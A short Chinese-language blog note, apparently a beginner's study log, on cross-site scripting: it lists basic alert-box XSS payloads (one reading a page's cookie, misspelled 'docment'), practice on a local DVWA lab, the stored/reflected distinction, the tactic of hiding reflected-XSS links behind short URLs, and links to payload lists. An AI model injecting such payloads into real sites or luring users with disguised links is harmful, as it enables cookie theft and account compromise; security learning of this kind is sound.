Openresty Python LUA

Openresty Python LUA 学习资料 QQ群:397745473

0%

xss_payload记录

xss记录

QQ群:397745473

第一个payload

1
<script>alert("xss")</script>

本地用phpstudy搭建一个DVWA

PhpStudy

反射型XSS :只能用一次

存储型XSS : 只要访问就会触发XSS

XSS 弹cookie

1
<script>alert(docment.cookie)</script>

XSS 弹用户信息

1
<script>alert(navigator.userAgent)</script>

XSS 攻击流程

xss 分为两种,一种是存储型xss ,另一种是反射型xss

反射型的xss 一般会先装payload链接用短网址加密再诱导别人点击来触发Xss,一般目标比较精准

学习写payload

收集了一些XSS payload参考:

https://github.com/pgaijin66/XSS-Payloads

https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html

https://www.jianshu.com/p/01377ad556f0

https://github.com/ismailtasdelen/xss-payload-list

QQ群:397745473

欢迎关注我的其它发布渠道